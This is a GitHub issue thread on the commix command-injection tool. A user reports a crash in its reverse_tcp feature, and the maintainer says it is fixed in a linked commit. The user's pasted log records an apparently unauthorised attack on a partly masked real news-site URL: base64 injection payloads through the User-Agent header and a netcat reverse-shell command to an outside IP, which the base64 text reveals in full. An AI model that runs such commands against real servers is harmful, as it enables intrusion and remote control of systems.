commixproject / commix

Automated All-in-One OS Command Injection Exploitation Tool.
https://commixproject.com

recurent error with reverse_tcp #66

Closed lacroutelacroute closed 7 years ago

lacroutelacroute commented 7 years ago

hello admin

I use the up-to-date version. It may be only me who does not know how to use it, but I cannot make reverse_tcp work. I am sure it is a Unix version; I have scanned the Apache frame, it is an Ubuntu version.

I am a whitehat hacker doing bug bounty research. I have discovered an injection point but have not proven it. I have scanned closed ports on the server with nmap option -d2.

I have never managed to run reverse_tcp on a remote server

:~$ sudo commix -v 1 -u "http://il*******.it/ANSAviewnews2.php" --random-agent --technique=f --level=3 --tamper=base64encode --batch commix.py
[commix ASCII-art banner] v1.8-dev#15 http://commixproject.com (@commixproject)

+-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst) +--

[*] Checking connection to the target URL... [ SUCCEED ]
[*] Identifying the target server... [ SUCCEED ]
[+] The target server was identified as nginx/1.8.0.
[*] Identifying the target application ... [ SUCCEED ]
[+] The target application was identified as PHP.
[*] Loading tamper script(s):
[~] base64encode
[!] Warning: Heuristics have failed to identify server's operating system.
[?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U
[*] Identifing the indicated web-page charset... [ SUCCEED ]
[+] The indicated web-page charset appears to be utf-8.
[*] Estimating the target URL response time... [ SUCCEED ]
[+] A previously stored session has been held against that host.
[*] Testing the (semi-blind) tempfile-based injection technique...
[+] The HTTP header User-Agent seems injectable via (semi-blind) tempfile-based injection technique.
[~] Payload: O3N0cj0kKGVjaG8gSlNXUUZQPi90bXAvSlNXUUZQLnR4dCk7c3RyPSQoY2F0IC90bXAvSlNXUUZQLnR4dCk7c3RyMT0keyNzdHJ9O2lmIFsgNiAtbmUgJHtzdHIxfSBdO3RoZW4gc2xlZXAgMDtlbHNlIHNsZWVwIDE7Zmkg

[*] Executing the 'rm /tmp/JSWQFP.txt ' command... |_ O3JtIC90bXAvSlNXUUZQLnR4dCAjPi90bXAvSlNXUUZQLnR4dA==

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LPORT 8000
LPORT => 8000
commix(reverse_tcp) > set LHOST 82.246.225.
LHOST => 82.246.225.

---[ Reverse TCP shells ]---
Type '1' to use a netcat reverse TCP shell.
Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 1

---[ Unix-like targets ]---
Type '1' to use the default Netcat on target host.
Type '2' to use Netcat for Busybox on target host.
Type '3' to use Netcat-Traditional on target host.

commix(reverse_tcp_netcat) > 1
[+] Everything is in place, cross your fingers and wait for a shell!

[*] Executing the '/bin/nc 82.246.225.** 8000 -e /bin/sh' command... |_ O2VjaG8gSlNXUUZQJChlY2hvIEpTV1FGUCkkKGVjaG8gJCgvYmluL25jIDgyLjI0Ni4yMjUuMzMgODAwMCAtZSAvYmluL3NoKSkkKGVjaG8gSlNXUUZQKUpTV1FGUA==
Traceback (most recent call last):
  File "./commix.py", line 979, in
    main(filename, url, init_test)
  File "./commix.py", line 793, in main
    controller.do_check(url, filename)
  File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 483, in do_check
    if perform_checks(url,filename) == False:
  File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 447, in perform_checks
    stored_http_header_injection(url, check_parameter, http_request_method, filename, timesec)
  File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 234, in stored_http_header_injection
    injection_proccess(url, check_parameter, http_request_method, filename, timesec)
  File "/pentest/exploitation/commix/src/core/injections/controller/controller.py", line 179, in injection_proccess
    if fb_handler.exploitation(url, timesec, filename, http_request_method, url_time_response) != False:
  File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 689, in exploitation
    if fb_injection_handler(url, timesec, filename, http_request_method, url_time_response) == False:
  File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 231, in fb_injection_handler
    tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
  File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/tempfile_based/tfb_handler.py", line 633, in exploitation
    if tfb_injection_handler(url, timesec, filename, tmp_path, http_request_method, url_time_response) == False:
  File "/pentest/exploitation/commix/src/core/injections/semiblind/techniques/tempfile_based/tfb_handler.py", line 558, in tfb_injection_handler
    go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again)
  File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 173, in check_option
    go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again)
  File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 146, in reverse_tcp_config
    execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option)
  File "/pentest/exploitation/commix/src/core/injections/controller/shell_options.py", line 69, in execute_shell
    shell = cb_injector.injection_results(response, TAG, cmd)
  File "/pentest/exploitation/commix/src/core/injections/results_based/techniques/classic/cb_injector.py", line 265, in injection_results
    html_data = response.read()
AttributeError: 'int' object has no attribute 'read'
:~$

stasinopoulos commented 7 years ago

Thanks for the bug report, I'll check it out soon.

stasinopoulos commented 7 years ago

Fixed at https://github.com/commixproject/commix/commit/d51e90b85344bd5c855a5c911681fa7ac8d3fa75

github-actions[bot] commented 2 years ago

This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related issues.